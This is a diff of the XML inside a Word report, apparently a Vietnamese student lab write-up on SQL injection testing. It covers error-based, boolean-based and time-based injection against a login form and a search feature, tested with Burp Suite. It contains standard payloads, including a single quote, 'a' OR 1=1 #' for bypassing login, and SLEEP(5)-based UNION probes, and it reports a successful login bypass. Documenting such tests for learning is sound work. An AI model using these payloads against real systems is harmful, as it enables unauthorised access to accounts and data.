--- a/REPORT.docx
+++ b/REPORT.docx
@@ -8,6 +8,7 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="FF0000"/>
           <w:sz w:val="44"/>
           <w:szCs w:val="44"/>
         </w:rPr>
@@ -16,6 +17,7 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="FF0000"/>
           <w:sz w:val="44"/>
           <w:szCs w:val="44"/>
         </w:rPr>
@@ -28,6 +30,7 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="FF0000"/>
           <w:sz w:val="44"/>
           <w:szCs w:val="44"/>
         </w:rPr>
@@ -36,6 +39,7 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="FF0000"/>
           <w:sz w:val="44"/>
           <w:szCs w:val="44"/>
         </w:rPr>
@@ -58,17 +62,40 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Error</w:t>
-      </w:r>
-      <w:r>
+        <w:t>Error-based SQL injection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>rror-based SQL injection là lỗ hổng khi người dùng nhập các payload nhạy cảm vào các trường được kiểm soát bởi người dùng như ô nhập tài khoản, mật khẩu của trang đăng nhập,.. và ứng dụng phản hồi lại bằng các thông báo lỗi liên quan tới cơ sở dữ liệu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>-b</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -76,165 +103,116 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>ased</w:t>
-      </w:r>
-      <w:r>
+        <w:t>Boolean-based SQL injection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Boolean-based SQL injection là lỗ hổng khi người dùng nhập vào các payload có các toán tử so sánh như OR 1=1 hoặc AND 1=2 để kiểm tra phản hồi của ứng dụng.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SQL injection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>E</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>rror-based SQL injection là lỗ hổng khi người dùng nhập các payload nhạy cảm vào các trường được kiểm soát bởi người dùng như ô nhập tài khoản, mật khẩu của trang đăng nhập,.. và ứng dụng phản hồi lại bằng các thông báo lỗi liên quan tới cơ sở dữ liệu.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>Time-based SQL injection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Time-based SQL injection là lỗ hổng khi ứng dụng không trả về một thông báo lỗi nào với input của người dùng, khi này chúng ta có thể kiểm tra bằng các payload như SLEEP(5), để xem ứng dụng có thực hiện câu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>lệnh này hay không, nếu trang web thực hiện load lại trang trong 5 giây thì trang web có thể đã bị SQL injection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Boolean-based SQL injection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Boolean-based SQL injection là lỗ hổng khi người dùng nhập vào các payload có các toán tử so sánh như OR 1=1 hoặc AND 1=2 để kiểm tra phản hồi của ứng dụng.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+        <w:t>1. Chức năng Login</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Truy cập vào trang web, ta </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nhận được một form để điền các thông tin đăng nhập.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Time-based SQL injection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Time-based SQL injection là lỗ hổng khi ứng dụng không trả về một thông báo lỗi nào với input của người dùng, khi này chúng ta có thể kiểm tra bằng các payload như SLEEP(5), để xem ứng dụng có thực hiện câu </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>lệnh này hay không, nếu trang web thực hiện load lại trang trong 5 giây thì trang web có thể đã bị SQL injection.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>1. Chức năng Login</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Truy cập vào trang web, ta </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>nhận được một form để điền các thông tin đăng nhập.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -288,43 +266,28 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Ta sẽ thử nhập vào payload như “ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>‘</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ” </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ở trường username và 123 cho trường password </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>để kiểm tra phản hồi của ứng dụng</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>Ta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sẽ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nhập</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> thử các giá trị ngẫu nhiên cho các thông tin đăng nhập và sử dụng Burp Suite để bắt request:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -340,10 +303,10 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E76A1FD" wp14:editId="47DF6A3A">
-            <wp:extent cx="5943600" cy="3187065"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="7" name="Picture 7"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DC86D30" wp14:editId="10DDA23E">
+            <wp:extent cx="5943600" cy="3190875"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="2" name="Picture 2"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -363,7 +326,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3187065"/>
+                      <a:ext cx="5943600" cy="3190875"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -388,14 +351,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Kết quả là ứng dụng trả về một thông báo lỗi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>Request Burp Suite bắt được:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -411,10 +367,10 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10BCF953" wp14:editId="733A728F">
-            <wp:extent cx="5943600" cy="158750"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="8" name="Picture 8"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78272C73" wp14:editId="685D7731">
+            <wp:extent cx="5943600" cy="3190875"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="3" name="Picture 3"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -434,7 +390,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="158750"/>
+                      <a:ext cx="5943600" cy="3190875"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -459,36 +415,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Có thể ứng dụng đã bị lỗ hổng SQL injection. Đây là một dạng của Error-based SQL injection.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Thông báo lỗi cho chúng ta biết ứng dụng sử dụng cơ sở dữ liệu MYSQL.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Chúng ta có thể sử dụng payload dạng Boolean SQL injection như “ </w:t>
+        <w:t xml:space="preserve">Ta sẽ thử nhập vào payload như “ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -496,28 +423,63 @@
           <w:szCs w:val="24"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>a’ OR 1=1 #</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ” để xem có thể</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>bypass được chức năng login hay không</w:t>
+        <w:t>‘</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ” </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ở trường username và </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">“ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>123</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cho trường password </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>để kiểm tra phản hồi của ứng dụng</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> với Burp Repeater</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -541,10 +503,10 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2020A759" wp14:editId="221688B2">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67875230" wp14:editId="5E9E4DCD">
             <wp:extent cx="5943600" cy="3187065"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="9" name="Picture 9"/>
+            <wp:docPr id="4" name="Picture 4"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -584,12 +546,107 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Kết quả là ta đã truy cập thành công trang chính của ứng dụng:</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Kết quả là ứng dụng trả về một thông báo lỗi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Có thể ứng dụng đã bị lỗ hổng SQL injection. Đây là một dạng của Error-based SQL injection.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Thông báo lỗi cho chúng ta biết ứng dụng sử dụng cơ sở dữ liệu MYSQL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Chúng ta có thể sử dụng payload dạng Boolean SQL injection như “ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>a’ OR 1=1 #</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ” để xem có thể</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>bypass được chức năng login hay không</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -605,10 +662,10 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="479A4991" wp14:editId="1464F1E4">
-            <wp:extent cx="5943600" cy="3183255"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="10" name="Picture 10"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="022AB9BD" wp14:editId="281ABB9E">
+            <wp:extent cx="5943600" cy="3194685"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="6" name="Picture 6"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -628,7 +685,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3183255"/>
+                      <a:ext cx="5943600" cy="3194685"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -653,42 +710,94 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ngoài ra, ta có thể kiểm tra lỗ hổng SQL injection theo kiểu Time-based với payload                      “ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>' UNION SELECT null,null,null,SLEEP(5) #</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> “ bằng cách sử dụng UNION, vì không biết table hiện tại có bao nhiêu cột nên ta sẽ thử bằng cách từ từ thêm các giá trị null thay cho các cột đến khi đúng số cột có trong table thì câu lệnh SLEEP sẽ được thực hiện:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:lastRenderedPageBreak/>
+        <w:t>Kết quả là ta đã truy cập thành công trang chính của ứng dụng</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Chức năng </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Search</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Tiếp cận trang web, ta có một chức năng khác là chức năng search</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, cho phép trang web hiển thị các blog phù hợp với từ khóa tìm kiếm của chúng ta:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BC4512C" wp14:editId="61CD0390">
-            <wp:extent cx="5943600" cy="3183255"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="298C60C2" wp14:editId="755FEF56">
+            <wp:extent cx="5943600" cy="3187065"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="19" name="Picture 19"/>
+            <wp:docPr id="11" name="Picture 11"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -708,7 +817,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3183255"/>
+                      <a:ext cx="5943600" cy="3187065"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -724,60 +833,73 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Chức năng </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Search</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Tiếp cận trang web, ta có một chức năng khác là chức năng search</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, cho phép trang web hiển thị các blog phù hợp với từ khóa tìm kiếm của chúng ta:</w:t>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Chúng ta </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">cũng </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sẽ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sử dụng Burp Suite để </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>kiểm tra xem chức năng này có lỗ hổng SQL injection không với payload như trên</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">“ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>‘</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “:</w:t>
       </w:r>
     </w:p>
